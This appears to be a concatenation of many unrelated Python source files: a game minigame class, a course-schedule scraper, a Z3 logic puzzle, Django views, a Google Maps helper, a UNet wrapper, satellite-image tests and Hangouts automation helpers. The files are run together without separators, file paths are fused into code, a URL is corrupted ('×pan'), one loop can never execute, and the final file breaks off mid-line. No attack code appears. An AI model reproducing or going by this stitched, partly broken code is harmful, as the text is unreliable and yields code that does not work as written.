self.localAv.b_setAnimState('happy') Sequence(Wait(3.5), Func(self.displayGameOver, 'winner')).start() def showPrize(self, amt): self.winSfx.play() self.localAv.b_setAnimState('happy') Sequence(Wait(3.5), Func(self.displayGameOver, 'showPrize', amt)).start() def loser(self): self.loseSfx.play() self.localAv.b_setAnimState('neutral') Sequence(Wait(3.5), Func(self.displayGameOver, 'loser')).start() def displayGameOver(self, scenario, amt=None): if scenario == 'winner': msg = self.winnerMsg % self.winnerPrize self.prizeHigh.play() else: if scenario == 'loser': msg = self.loserMsg % self.loserPrize self.prizeLow.play() else: if scenario == 'showPrize': msg = random.choice(self.allWinnerMsgs) % amt self.prizeHigh.play() self.gameOverDialog = GlobalDialog(message=msg, style=3, doneEvent='gameOverAck') self.acceptOnce('gameOverAck', self.__handleGameOverAck) self.gameOverDialog.show() def deleteGameOverDialog(self): self.ignore('gameOverAck') if hasattr(self, 'gameOverDialog'): self.gameOverDialog.cleanup() del self.gameOverDialog def __handleGameOverAck(self): self.fsm.requestFinalState() Sequence(Func(base.transitions.irisOut, 1.0), Wait(1.2), Func(self.d_leaving), Func(self.headBackToMinigameArea)).start() def headBackToMinigameArea(self): whereName = ZoneUtil.getWhereName(CIGlobals.MinigameAreaId) loaderName = ZoneUtil.getLoaderName(CIGlobals.MinigameAreaId) requestStatus = {'zoneId': CIGlobals.MinigameAreaId, 'hoodId': CIGlobals.MinigameArea, 'where': whereName, 'how': 'teleportIn', 'avId': base.localAvatar.doId, 'shardId': None, 'loader': loaderName} self.cr.playGame.hood.fsm.request('quietZone', [requestStatus]) return def abort(self): self.headBackToMinigameArea() def load(self, showDesc=True): if showDesc: self.fsm.request('start') base.transitions.irisIn() def d_leaving(self): self.sendUpdate('leaving', []) def allPlayersReady(self): self.fsm.request('play') def enterPlay(self): self.playMinigameMusic() def exitPlay(self): self.stopMinigameMusic() def enterOff(self): pass def exitOff(self): pass def enterGameOver(self, winner, winnerDoId, allPrize): if winner: if self.localAvId in winnerDoId: self.winner() else: self.loser() else: self.showPrize(allPrize) def exitGameOver(self): self.deleteGameOverDialog() def gameOver(self, winner=0, winnerDoId=[], allPrize=0): self.fsm.request('gameOver', [winner, winnerDoId, allPrize]) def setMinigameMusic(self, path): self.musicPath = path def getMinigameMusic(self): return self.musicPath def playMinigameMusic(self): self.stopMinigameMusic() self.music = base.loadMusic(self.musicPath) self.music.setLoop(True) self.music.setVolume(0.8) self.music.play() def stopMinigameMusic(self): if self.music: self.music.stop() self.music = None return def d_ready(self): self.sendUpdate('ready', []) def announceGenerate(self): DistributedObject.DistributedObject.announceGenerate(self) base.minigame = self self.alertText = getAlertText() self.popupSound = base.loadSfx('phase_3/audio/sfx/GUI_balloon_popup.ogg') NametagGlobals.setWant2dNametags(False) def disable(self): base.localAvatar.getGeomNode().setColorScale(VBase4(1, 1, 1, 1)) if hasattr(self, 'gameOverLbl') and self.gameOverLbl: self.gameOverLbl.destroy() self.gameOverLbl = None NametagGlobals.setWant2dNametags(True) base.localAvatar.setPosHpr(0, 0, 0, 0, 0, 0) self.fsm.requestFinalState() del self.fsm self.winSfx = None self.loseSfx = None self.prizeHigh = None self.prizeLow = None self.headPanels.delete() self.headPanels = None self.finalScoreUI.unload() self.finalScoreUI = None base.minigame = None DistributedObject.DistributedObject.disable(self) returnfhir_kindling/serde/__init__.py from .flatten import flatten_resource, flatten_resources #!/usr/bin/env python2 """Common utility functions.""" DEFAULT_OBJECT_NUMBER = 1238 DEFAULT_BAD_OBJECT_NUMBER = 23 OBJECTS_FILE = 'objects.txt' WORKING_SET_FILE = 'working_set.txt' def ReadWorkingSet(): working_set = [] f = open(WORKING_SET_FILE, 'r') for l in f: working_set.append(int(l)) f.close() return working_set def WriteWorkingSet(working_set): f = open(WORKING_SET_FILE, 'w') for o in working_set: f.write('{0}\n'.format(o)) f.close() def ReadObjectsFile(): objects_file = [] f = open(OBJECTS_FILE, 'r') for l in f: objects_file.append(int(l)) f.close() return objects_file def ReadObjectIndex(filename): object_index = [] f = open(filename, 'r') for o in f: object_index.append(int(o)) f.close() return object_index old/Crawl.py from bs4 import BeautifulSoup import requests import json from cleanSubTime import cleanScheduleTime def Get_Url(discipline: str, keyword1: str) -> str: ''' Trả về đường link source của môn học >>> Get_Url("ENG", "116") ''' parameters = { 'discipline': discipline, # F = 1 (ENG 116), F = 2 (CS 303) 'keyword1': keyword1, 'hocky': '70', } r = requests.get('http://courses.duytan.edu.vn/Modules/academicprogram/CourseResultSearch.aspx', parameters) soup = BeautifulSoup(r.text, 'html.parser') def XuLyUrlSub(url_sub: str) -> str: print('url',url_sub) url = "http://courses.duytan.edu.vn/Modules/academicprogram/CourseClassResult.aspx?courseid=55&semesterid=70×pan=70" courseid = url_sub[73:url_sub.find("×pan")] return url.replace(url[85:87], courseid) try: url_sub = soup.find_all(class_='hit')[2]['href'] # link sau khi press Search return XuLyUrlSub(url_sub) except: return None def Get_Soup(url_sub: str): req = requests.get(url_sub) soup = BeautifulSoup(req.text, 'html.parser') return soup def CheckExistLab(soup): ''' Hàm này để kiểm tra môn học có lớp Thực hành không Nếu có sẽ trả về True, không có trả về False ''' templst = [] tr_tags = soup.find_all("tr", class_ = "lop") for tr_tag in tr_tags: templst.append(str(tr_tag('td')[2].string).strip()) if len(set(templst)) == 2: return True else: return False def GetListExistId(soup, lst_input: list): result = [] key = [] list_sub_id = [] tr_tags = soup.find_all("tr", class_ = "lop") for tr_tag in tr_tags: list_sub_id.append(str(tr_tag('td')[1].a.string).strip()) if CheckExistLab(soup): for i in range(len(list_sub_id)): if i % 2 == 0: list_sub_id[i] = list_sub_id[i+1] for i in range(len(list_sub_id)): if list_sub_id[i] != "": key.append(i) for i in range(len(lst_input)): if i in key: result.append(lst_input[i]) return result def GetName(soup): out = [] tr_tags = soup.find_all('tr', class_="lop") for tr_tag in tr_tags: out.append(str(tr_tag.td.a.string).strip()) return GetListExistId(soup, out) def GetID(soup): list_sub_id = [] tr_tags = soup.find_all("tr", class_ = "lop") for tr_tag in tr_tags: list_sub_id.append(str(tr_tag('td')[1].a.string).strip()) if CheckExistLab(soup): for i in range(len(list_sub_id)): if i % 2 == 0: list_sub_id[i] = list_sub_id[i+1] while ("" in list_sub_id): list_sub_id.remove("") return list_sub_id def GetSeat(soup): list_sub_seat = [] templst = [] result = [] td_list = soup.find_all("td", align = "center") for td_tag in td_list: templst.append((str(td_tag.text).strip())) for temp in templst: if (len(temp) <= 2) or temp == "Hết chỗ": list_sub_seat.append(temp) for mem in list_sub_seat: if mem == "Hết chỗ": result.append(int(0)) else: result.append(int(mem)) return GetListExistId(soup, result) def GetCredit(soup): ''' Phương thức này trả về 1 int, không phải list vì Credit của các lớp bằng nhau ''' templst = soup.find(style = "width: 130px;") for mem in templst: tr_tag = mem.parent tr_tag_next = tr_tag.findNext("tr") tinchi = str(tr_tag_next.text).strip() key = tinchi.find("(") tinchi = int(tinchi[key+1]) return tinchi def GetSchedule(soup): lst = [] tr_list = soup.find_all("tr", class_='lop') for tr_tag in tr_list: lst.append(json.dumps(cleanScheduleTime(str(tr_tag('td')[6])))) return GetListExistId(soup, lst) def GetWeekRange(soup): list_week = [] td_list = soup.find_all("td", style = "text-align: center;") for td_tag in td_list: list_week.append(str(td_tag.text).strip()) return GetListExistId(soup, list_week) def GetStatus(soup): lst = [] result = [] tr_list = soup.find_all("tr", class_='lop') for tr_tag in tr_list: lst.append(str(tr_tag('td')[10].font.string)) for mem in lst: if mem == "Còn Hạn Đăng Ký": result.append(int(1)) else: result.append(int(0)) return GetListExistId(soup, result) def GetSubName(soup): div_tag = soup.find(class_ = "title-1") return div_tag.string[div_tag.string.find(":") + 1 : ].replace(" ", "").replace("\xa0\r\n", "") def GetPlace(soup): list_sub_place = [] result = [] templst = [] tr_list = soup.find_all("tr", class_='lop') for tr_tag in tr_list: list_sub_place.append(str(tr_tag('td')[8].text).split("\r\n")) for place in list_sub_place: for mem in place: temp = mem.strip() if temp != "": templst.append(temp) result.append(", ".join(templst)) templst = [] return GetListExistId(soup, result) def GetTeacher(soup): list_sub_teacher = [] templst = [] result = [] tr_list = soup.find_all("tr", class_='lop') for tr_tag in tr_list: list_sub_teacher.append(str(tr_tag('td')[9].text).strip()) for i in range(len(list_sub_teacher)): if list_sub_teacher[i] == "": list_sub_teacher[i] = "" for mem in list_sub_teacher: templst.append(mem.split()) for temp in templst: result.append(" ".join(temp)) return GetListExistId(soup, result) if __name__ == "__main__": print(Get_Url("PSU-FIN","301"))from flask import Blueprint hello = Blueprint('hello', __name__) from . import views import os l=os.listdir('data') for i in l: pre='data/{}'.format(i) post=i[:-4]+'o' os.system('ld -r -b binary {} -o bin/{}'.format(pre,post)) GeekLogan/dcimg import re from setuptools import setup def get_version(): VERSIONFILE = 'dcimg.py' initfile_lines = open(VERSIONFILE, 'rt').readlines() VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]" for line in initfile_lines: mo = re.search(VSRE, line, re.M) if mo: return mo.group(1) raise RuntimeError('Unable to find version string in %s.' % (VERSIONFILE,)) with open("README.md", "r", encoding="utf-8") as fh: long_description = fh.read() setup( name='dcimg', version=get_version(), description='Python module to read Hamamatsu DCIMG files', long_description=long_description, long_description_content_type="text/markdown", url='https://github.com/lens-biophotonics/dcimg', # Author details author='', author_email='', # Choose your license license='MIT', # See https://pypi.python.org/pypi?%3Aaction=list_classifiers classifiers=[ # How mature is this project? Common values are # 3 - Alpha # 4 - Beta # 5 - Production/Stable 'Development Status :: 3 - Alpha', # Indicate who your project is intended for 'Intended Audience :: Developers', 'Topic :: Scientific/Engineering', # Pick your license as you wish (should match "license" above) 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', ], # What does your project relate to? keywords='dcimg image files hamamatsu', py_modules=['dcimg'], install_requires=['numpy'], # List additional groups of dependencies here (e.g. development # dependencies). You can install these using the following syntax, # for example: # $ pip install -e .[dev,test] extras_require={ 'dev': [ 'pip-tools', ], 'test': [ 'ddt', ], 'doc': [ 'numpydoc', 'sphinx', 'sphinx_rtd_theme', ] }, ) z3/tunapalooza.py #!/usr/bin/python -u # -*- coding: latin-1 -*- # # Tunalalooza puzzle (Dell Logic Puzzles) in Z3 # # http://brownbuffalo.sourceforge.net/TunapaloozaClues.html # """ # Title: Tunapalooza # Author: # Publication: Dell Logic Puzzles # Issue: April, 1998 # Page: 10 # Stars: 2 # # Tim and Keri have a full day ahead for themselves as they plan to see # and hear everything at Tunapalooza '98, the annual save-the-tuna benefit # concert in their hometown. To cover the most ground, they will have to # split up. They have arranged to meet during four rock band acts # (Ellyfish, Korrupt, Retread Ed and the Flat Tires, and Yellow Reef) at # planned rendezvous points (carnival games, information booth, mosh pit, # or T-shirt vendor). Can you help match each band name with the type of # music they play (country, grunge, reggae, or speed metal) and Tim and # Kerri's prearranged meeting spot while they play? # # 1. Korrupt isn't a country or grunge music band. # 2. Tim and Kerri won't meet at the carnival games during Ellyfish's # performance. # 3. The pair won't meet at the T-shirt vendor during the reggae band's show. # 4. Exactly two of the following three statements are true: # a) Ellyfish plays grunge music. # b) Tim and Kerri won't meet at the information booth during a # performance by Retread Ed and the Flat Tires. # c) The two friends won't meet at the T-shirt vendor while Yellow Reef is playing. # 5. The country and speed metal acts are, in some order, Retread Ed # and the Flat Tires and the act during which Tim and Kerri will # meet at the mosh pit. # 6. The reggae band is neither Korrupt nor the act during which Tim and # Kerri will meet at the information booth. # # Determine: Band name -- Music type -- Meeting place # """ # # This Z3 model was written by () # See also my Z3 page: http://hakank.org/z3/ # from z3_utils_hakank import * sol = Solver() # data n = 4 rockband = range(n) [Ellyfish, Korrupt, Retread_Ed_and_the_Flat_Tires, Yellow_Reef] = rockband # variables genre = makeIntArrayVector(sol,"genre",n, 0,n-1) country, grunge, reggae, speed_metal = genre rendevouz = makeIntArrayVector(sol,"rendevouz",n, 0,n-1) carnival_games, information_booth, mosh_pit, T_shirt_vendor = rendevouz # constraints sol.add(Distinct([genre[i] for i in range(n)])) sol.add(Distinct([rendevouz[i] for i in range(n)])) # 1. Korrupt isn't a country or grunge music band. sol.add(Korrupt != country,Korrupt != grunge) # 2. Tim and Kerri won't meet at the carnival games during Ellyfish's # performance. sol.add(Ellyfish != carnival_games) # 3. The pair won't meet at the T-shirt vendor during the reggae # band's show. sol.add(reggae != T_shirt_vendor) # 4. Exactly two of the following three statements are true: # a) Ellyfish plays grunge music. # b) Tim and Kerri won't meet at the information booth during a # performance by Retread Ed and the Flat Tires. # c) The two friends won't meet at the T-shirt vendor while # Yellow Reef is playing. sol.add( If(Ellyfish == grunge,1,0) + If(information_booth != Retread_Ed_and_the_Flat_Tires,1,0) + If(T_shirt_vendor != Yellow_Reef,1,0) == 2) # 5. The country and speed metal acts are, in some order, Retread Ed # and the Flat Tires and the act during which Tim and Kerri will # meet at the mosh pit. sol.add(Or( And( country == Retread_Ed_and_the_Flat_Tires, speed_metal == mosh_pit ) , And( speed_metal == Retread_Ed_and_the_Flat_Tires, country == mosh_pit ) )) # 6. The reggae band is neither Korrupt nor the act during which Tim and # Kerri will meet at the information booth. sol.add(reggae != Korrupt) sol.add(reggae != information_booth) num_solutions = 0 while sol.check() == sat: num_solutions += 1 mod = sol.model() print("rockband :", [rockband[i] for i in range(n)]) print("genre :", [mod.eval(genre[i]) for i in range(n)]) print("rendevouz:", [mod.eval(rendevouz[i]) for i in range(n)]) print() getDifferentSolution(sol,mod,list(genre), list(rendevouz)) print("num_solutions:", num_solutions) dwillis/django-calaccess-processed-data #!/usr/bin/env python # -*- coding: utf-8 -*- """ Load the OCD Candidacy model with data extracted from the Form501Filing model. """ from __future__ import unicode_literals from django.core.management.base import CommandError from opencivicdata.elections.models import CandidateContest from calaccess_processed.management.commands import CalAccessCommand from calaccess_processed.models import Form501Filing, OCDCandidacyProxy class Command(CalAccessCommand): """ Load the OCD Candidacy model with data extracted from the Form501Filing model. """ help = 'Load the OCD Candidacy model with data extracted from the Form501Filing model' def handle(self, *args, **options): """ Make it happen. """ super(Command, self).handle(*args, **options) if not CandidateContest.objects.exists(): error_message = 'No contests currently loaded (run loadocdcandidatecontests).' if self._called_from_command_line: self.failure(error_message) else: raise CommandError(error_message) else: self.header("Loading additional candidacies from Form 501 filings") for form501 in Form501Filing.objects.without_candidacy(): if self.verbosity > 2: self.log(' Processing Form 501: %s' % form501.filing_id) # Get a linked contest contest = form501.get_contest() # If there is no contest, quit. if not contest: return None candidacy, created = OCDCandidacyProxy.objects.get_or_create_from_calaccess( contest, form501.parsed_name, candidate_filer_id=form501.filer_id ) if created and self.verbosity > 2: tmp = ' Created new Candidacy: {0.candidate_name} in {0.post.label}' self.log(tmp.format(candidacy)) candidacy.link_form501(form501) candidacy.update_from_form501(form501) self.success("Done!") from django.shortcuts import render, HttpResponse # Create your views here. def plan_course(request): return HttpResponse("PLAN COURSE")from django.http import Http404 from django.views.generic import ListView, DetailView from django.shortcuts import render, get_object_or_404 from carts.models import Cart from .models import Greenery class GreeneryFeaturedListView(ListView): template_name = "greenery/list.html" def get_queryset(self, *args, **kwargs): request = self.request return Greenery.objects.all().featured() class GreeneryFeaturedDetailView(DetailView): queryset = Greenery.objects.all().featured() template_name = "greenery/featured-detail.html" # def get_queryset(self, *args, **kwargs): # request = self.request # return Greenery.objects.featured() class GreeneryListView(ListView): template_name = "greenery/list.html" def get_queryset(self, *args, **kwargs ): request = self.request return Greenery.objects.all() def greenery_list_view(request): queryset = Greenery.objects.all() context = { 'object_list': queryset } return render(request, "greenery/list.html", context) class GreeneryDetailSlugView(DetailView): queryset = Greenery.objects.all() template_name = "greenery/detail.html" def get_context_data(self, *args, **kwargs): context = super(GreeneryDetailSlugView, self).get_context_data(*args, **kwargs) cart_obj, new_obj = Cart.objects.new_or_get(self.request) context['cart'] = cart_obj return context def get_object(self, *args, **kwargs): request = self.request slug = self.kwargs.get('slug') #instance = get_object_or_404(Greenery, slug=slug, active=True) try: instance = Greenery.objects.get(slug=slug, active=True) except Greenery.DoesNotExist: raise Http404("You Lost Homie..") except Greenery.MultipleObjectsReturned: qs = Greenery.objects.filter(slug=slug, active=True) instance = qs.first() except: raise Http404("Sad Face how you get here ") return instance class GreeneryDetailView(DetailView): template_name = "greenery/detail.html" def get_context_data(self, *args, **kwargs): context = super(GreeneryDetailView, self).get_context_data(*args, **kwargs) print(context) return context def get_object(self, *args, **kwargs): request = self.request pk = self.kwargs.get('pk') instance = Greenery.objects.get_by_id(pk) if instance is None: raise Http404("We ain't got it bruh!") return instance def greenery_detail_view(request, pk=None, *args, **kwargs): instance = Greenery.objects.get_by_id(pk) if instance is None: raise Http404("We ain't got it bruh!") # qs = Greenery.objects.filter(id=pk) # #print(qs) # if qs.exists() and qs.count() == 1: # len(qs) # instance = qs.first() # else: # raise Http404("Aint Got What You Looking For Bruh!") context = { 'object': instance } return render(request, "greenery/list.html", context) import requests import json import datetime import pytz from traffic.secrets._apikey import API_KEY BASE_API_URL = "https://maps.googleapis.com/maps/api/directions" def getOptimalRouteTime(dt, origin, destination, model="pessimistic"): # google API depature time works from seconds since midnight 01/01/1970 UTC time depature_time_secs = int((dt-datetime.datetime(1970, 1, 1, 0, 0, tzinfo=pytz.timezone('UTC'))).total_seconds()) departure_time = "{0}".format(depature_time_secs) api_url = "{0}/json?origin={1}&destination={2}&departure_time={3}&traffic_model={4}&key={5}".format(BASE_API_URL, origin, destination, departure_time, model, API_KEY ) r = requests.get(api_url) data = r.json() # get the minimum time for all routes time_in_secs = float("inf") for r in data['routes']: route_time_in_secs = 0 for l in r['legs']: route_time_in_secs += l['duration_in_traffic']['value'] time_in_secs = min(route_time_in_secs, time_in_secs) return time_in_secs def create_new_employee_department(): employee_department = [] emp = ' ' while emp != ' ': emp_department_input = input('Enter employee last name \n') employee_department.append(emp_department_input) return employee_department """ SoftLayer.CLI.routes ~~~~~~~~~~~~~~~~~~~ Routes for shell-specific commands :license: MIT, see LICENSE for more details. """ ALL_ROUTES = [ ('exit', 'SoftLayer.shell.cmd_exit:cli'), ('shell-help', 'SoftLayer.shell.cmd_help:cli'), ('env', 'SoftLayer.shell.cmd_env:cli'), ] ALL_ALIASES = { '?': 'shell-help', 'help': 'shell-help', 'quit': 'exit', } import torch import torch.nn as nn import segmentation_models_pytorch as smp import torchvision import torchvision.transforms.functional as TVF import PIL class ImageNetPreprocess(nn.Module): def __init__(self, device, encoder_architecture="resnet18"): super().__init__() params = smp.encoders.get_preprocessing_params(encoder_architecture, "imagenet") self.normalize = torchvision.transforms.Normalize(mean=params["mean"], std=params["std"]) def forward(self, x): return self.normalize(x) class UNet(nn.Module): """A simple UNet wrapper that handles ImageNet normalization in-network""" def __init__(self, imagenet_pretrained: bool, encoder_architecture, input_shape, device, auto_resize_in: bool, auto_resize_out: bool): super().__init__() self.imagenet_pretrained = imagenet_pretrained self.input_shape = input_shape self.auto_resize_in = auto_resize_in self.auto_resize_out = auto_resize_out encoder_weights = "imagenet" if imagenet_pretrained else None self.underlying = smp.Unet(encoder_architecture, encoder_weights=encoder_weights, in_channels=3, activation='sigmoid').to(device) self.preprocess = ImageNetPreprocess(device, encoder_architecture).to(device) def forward(self, x): assert x.ndim == 4, f"Illegal input shape {x.shape}. Expected (B,C,H,W) shape." original_shape = x.shape[2:] if self.auto_resize_in and original_shape != self.input_shape: x = TVF.resize(x, self.input_shape, PIL.Image.NEAREST) if x.dtype == torch.uint8: x = x / 255.0 if self.imagenet_pretrained: x = self.preprocess(x) y = self.underlying(x) if self.auto_resize_out: y = TVF.resize(y, original_shape, PIL.Image.NEAREST) y = torch.squeeze(y, dim=1) return y david-a-parry/muvermuver/allelic_fraction.py from collections import defaultdict import re import numpy import csv from wrappers.samtools import mpileup_iter def get_allelic_fractions(bam_file, ref_fn, output_file): ''' Read over a BAM file, output an allele fraction histogram. ''' allele_fractions = [] for line in mpileup_iter(bam_file, ref_fn): allele_counts = defaultdict(int) line_split = line.strip().split() reference_allele, coverage = line_split[2:4] if int(coverage) > 0: bases = line_split[4] else: bases = '' i = 0 while i < len(bases): if re.match('[.,]', bases[i]): allele_counts[reference_allele] += 1 elif re.match('[ACGTacgt]', bases[i]): allele_counts[bases[i].upper()] += 1 elif re.match('[+-]', bases[i]): indel_type = bases[i] i += 1 indel_length = int(bases[i]) i += 1 indel = indel_type + bases[i:i+indel_length].upper() allele_counts[indel] += 1 i += indel_length elif bases[i] == '^': i += 1 elif bases[i] == '*': allele_counts[bases[i]] += 1 i += 1 _sum = sum(allele_counts.values()) if _sum > 20: for value in allele_counts.values(): allele_fractions.append(float(value) / _sum) bins = [(0.01 * i) for i in range(101)] histogram = numpy.histogram(allele_fractions, bins=bins, density=False) with open(output_file, 'w') as OUT: fieldnames = ['Bin start', 'Count'] writer = csv.DictWriter(OUT, fieldnames=fieldnames, delimiter='\t') writer.writeheader() for value, bin_start in zip(histogram[0], histogram[1]): writer.writerow({ 'Bin start': str(bin_start), 'Count': str(value), }) tests/test_satimg.py """ Test functions for SatelliteImage class """ import os import sys import pytest import datetime as dt import numpy as np import geoutils.georaster as gr import geoutils.satimg as si from geoutils import datasets import geoutils from io import StringIO import numpy as np DO_PLOT = False class TestSatelliteImage: def test_init(self): """ Test that inputs work properly in SatelliteImage class init """ fn_img = datasets.get_path("landsat_B4") # from filename, checking option img = si.SatelliteImage(fn_img, read_from_fn=False) img = si.SatelliteImage(fn_img) assert isinstance(img,si.SatelliteImage) # from SatelliteImage img2 = si.SatelliteImage(img) assert isinstance(img2,si.SatelliteImage) # from Raster r = gr.Raster(fn_img) img3 = si.SatelliteImage(r) assert isinstance(img3,si.SatelliteImage) assert np.logical_and.reduce((np.array_equal(img.data, img2.data, equal_nan=True), np.array_equal(img2.data, img3.data, equal_nan=True))) assert np.logical_and.reduce((np.all(img.data.mask == img2.data.mask), np.all(img2.data.mask == img3.data.mask))) def test_silent(self): """ Test that the silent method does not return any output in console """ fn_img = datasets.get_path("landsat_B4") # let's capture stdout # cf https://stackoverflow.com/questions/16571150/how-to-capture-stdout-output-from-a-python-function-call class Capturing(list): def __enter__(self): self._stdout = sys.stdout sys.stdout = self._stringio = StringIO() return self def __exit__(self, *args): self.extend(self._stringio.getvalue().splitlines()) del self._stringio # free up some memory sys.stdout = self._stdout with Capturing() as output1: img = si.SatelliteImage(fn_img) # check the metadata reading outputs to console assert len(output1)>0 with Capturing() as output2: img = si.SatelliteImage(fn_img,silent=True) # check nothing outputs to console assert len(output2)==0 def test_copy(self): """ Test that the copy method works as expected for SatelliteImage. In particular when copying r to r2: - if r.data is modified and r copied, the updated data is copied - if r is copied, r.data changed, r2.data should be unchanged """ # Open dataset, update data and make a copy r = si.SatelliteImage(datasets.get_path("landsat_B4")) r.data += 5 r2 = r.copy() # Objects should be different (not pointing to the same memory) assert r is not r2 # Check the object is a SatelliteImage assert isinstance(r2, geoutils.satimg.SatelliteImage) # check all immutable attributes are equal # georaster_attrs = ['bounds', 'count', 'crs', 'dtypes', 'height', 'indexes', 'nodata', # 'res', 'shape', 'transform', 'width'] # satimg_attrs = ['satellite', 'sensor', 'product', 'version', 'tile_name', 'datetime'] # using list directly available in Class attrs = [at for at in gr.default_attrs if at not in ['name', 'dataset_mask', 'driver']] all_attrs = attrs + si.satimg_attrs for attr in all_attrs: assert r.__getattribute__(attr) == r2.__getattribute__(attr) # Check data array assert np.array_equal(r.data, r2.data, equal_nan=True) # Check dataset_mask array assert np.all(r.data.mask == r2.data.mask) # Check that if r.data is modified, it does not affect r2.data r.data += 5 assert not np.array_equal(r.data, r2.data, equal_nan=True) def test_filename_parsing(self): copied_names = ['TDM1_DEM__30_N00E104_DEM.tif', 'SETSM_WV02_20141026_1030010037D17F00_10300100380B4000_mosaic5_2m_v3.0_dem.tif', 'AST_L1A_00303132015224418_final.tif', 'ILAKS1B_20190928_271_Gilkey-DEM.tif', 'srtm_06_01.tif', 'ASTGTM2_N00E108_dem.tif', 'N00E015.hgt', 'NASADEM_HGT_n00e041.hgt'] # Corresponding data, filled manually satellites = ['TanDEM-X', 'WorldView', 'Terra', 'IceBridge', 'SRTM', 'Terra', 'SRTM', 'SRTM'] sensors = ['TanDEM-X', 'WV02', 'ASTER', 'UAF-LS', 'SRTM', 'ASTER', 'SRTM', 'SRTM'] products = ['TDM1', 'ArcticDEM/REMA', 'L1A', 'ILAKS1B', 'SRTMv4.1', 'ASTGTM2', 'SRTMGL1', 'NASADEM-HGT'] # we can skip the version, bit subjective... tiles = ['N00E104', None, None, None, '06_01', 'N00E108', 'N00E015', 'n00e041'] datetimes = [None, dt.datetime(year=2014,month=10,day=26),dt.datetime(year=2015,month=3,day=13,hour=22,minute=44,second=18), dt.datetime(year=2019,month=9,day=28),dt.datetime(year=2000,month=2,day=15),None,dt.datetime(year=2000,month=2,day=15), dt.datetime(year=2000,month=2,day=15)] for names in copied_names: attrs = si.parse_metadata_from_fn(names) i = copied_names.index(names) assert satellites[i] == attrs[0] assert sensors[i] == attrs[1] assert products[i] == attrs[2] assert tiles[i] == attrs[4] assert datetimes[i] == attrs[5] def test_sw_tile_naming_parsing(self): #normal examples test_tiles = ['N14W065','S14E065','N014W065','W065N014','W065N14','N00E000'] test_latlon = [(14,-65),(-14,65),(14,-65),(14,-65),(14,-65),(0,0)] for tile in test_tiles: assert si.sw_naming_to_latlon(tile)[0] == test_latlon[test_tiles.index(tile)][0] assert si.sw_naming_to_latlon(tile)[1] == test_latlon[test_tiles.index(tile)][1] for latlon in test_latlon: assert si.latlon_to_sw_naming(latlon) == test_tiles[test_latlon.index(latlon)] # check possible exceptions, rounded lat/lon belong to their southwest border assert si.latlon_to_sw_naming((0, 0)) == 'N00E000' # those are the same point, should give same naming assert si.latlon_to_sw_naming((-90, 0)) == 'S90E000' assert si.latlon_to_sw_naming((90, 0)) == 'S90E000' # same here assert si.latlon_to_sw_naming((0, -180)) == 'N00W180' assert si.latlon_to_sw_naming((0, 180)) == 'N00W180'""" Base classes and utilities for working with hangouts settings """ from hangout_api.exceptions import NoSuchDeviceFound from hangout_api.utils import silence_contextmanager, names_cleaner, TIMEOUTS from retrying import retry class BaseSettings(object): # pylint: disable=R0903 """ Base class that handling device setting """ device_class = NotImplementedError def __init__(self, base): self.base = base def get_devices(self, with_nodes=False): """ Return devices list """ raise NotImplementedError() @retry(stop_max_attempt_number=3) def _devices_getter( self, device_xpath, devices_list_xpath, with_nodes): """ Returns list of the devices based on device_xpath and devices_list_xpath arguments. Because HG is build all DOM dynamically there is need to make some actions before list of devices appear in DOM, this method handles it and also parses list values. """ self.base.navigate_to_devices_settings() # click on MC list to make it load list of all devices device_box = self.base.browser.xpath(device_xpath).parent with silence_contextmanager(device_box): if device_box.by_class('c-h-i-b-o', timeout=TIMEOUTS.immediately): # if this class present that means that there is no devices # available to change device_name = device_box.get_attribute( 'innerText').split('\n')[0].strip() # in case if there is no devices at all return empty list if ' found' in device_name: return [] return [self.device_class(names_cleaner(device_name))] device_box.click(timeout=TIMEOUTS.fast) # get list of devices devices = { names_cleaner(n.get_attribute('innerText')): n for n in self.base.browser.xpath(devices_list_xpath, eager=True)} if with_nodes: return devices # pylint: disable=bad-builtin return list(map(self.device_class, devices.keys())) @retry(stop_max_attempt_number=3) def _device_setter(self, device_name): """ Devices setter that can handle special cases when only 1 device is available or no devices at all. In case if device can not be set raise NoSuchDeviceFound exception """ if isinstance(device_name, self.device_class): device_name = device_name.name devices = self.get_devices(with_nodes=True) if len(devices) == 1: # there is no sense to set devise # if no devices or only one device are available return # pylint: disable=bad-builtin if device_name not in devices: raise NoSuchDeviceFound( "Can't find device with name '%s'" % device_name) self.get_devices(with_nodes=True)[device_name].click() self.base.click_on_devices_save_button() @retry(stop_max_attempt_number=3) def _current_device_getter(self, text_selector, parrenty=2): """ Returns currently used device """ self.base.navigate_to_devices_settings() base_element = self.base.browser.by_text(text_selector) for _ in range(parrenty): base_element = base_element.parent device_name = names_cleaner( base_element.get_attribute('innerText').split('\n')[0]) return self.device_class(device_name) class MutingHandler(object): """ Handler to interact with mute buttons, like "Mute Video". """ # pylint: disable=R0913 def __init__(self, base, base_text, mute_label, unmute_label, no_device): self.base = base self.base_text = base_text self.mute_label = mute_label self.unmute_label = unmute_label self.xpath = '//div[contains(@aria-label, "%s")]' % self.base_text self.no_device_xpath = '//div[contains(@aria-label, "%s")]' % no_device @retry(stop_max_attempt_number=3) def get_mute_button_label(self): """ Returns current text of 'mute' button. In case if muting is not available (no device found) raises NoSuchDeviceFound """ self.base.click_cancel_button_if_there_is_one() with silence_contextmanager(self.base.browser): mute_button = self.base.browser.xpath(self.xpath) if mute_button is None: with silence_contextmanager(self.base.browser): no_device = self.base.browser.xpath( self.no_device_xpath, timeout=TIMEOUTS.fast) if no_device: raise NoSuchDeviceFound('No device found') # raising original exception self.base.browser.xpath(self.xpath, timeout=TIMEOUTS.fast) return mute_button.get_attribute('aria-label') @retry(stop_max_attempt_number=3) def is_muted(self): """ Returns True if muted otherwise False """ return self.get_mute_button_label() == self.unmute_label @retry(stop_max_attempt_number=3) def mute(self): """ Mutes device """ if self.get_mute_button_label() == self.unmute_label: return False self.base.click_menu_element(self.xpath) return True @retry(stop_max_attempt_number=3) def unmute(self): """ Un-mutes device """ if self.get_mute_button_label() == self.mute_label: return False self.base.click_menu_element(self.xpath) return True #!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Created on Thu Feb 6 11:11:12 2020 @author: liubing """ import argparse import numpy as np import sys import pickle from sklearn.ensemble import RandomForestClassifier from sklearn.metrics import accuracy_score sys.path.insert(0, "lib") from gcforest.gcforest import GCForest from gcforest.utils.config_utils import load_json import h5py def get_label(gc, train_images): num = len(train_images)/1000 y 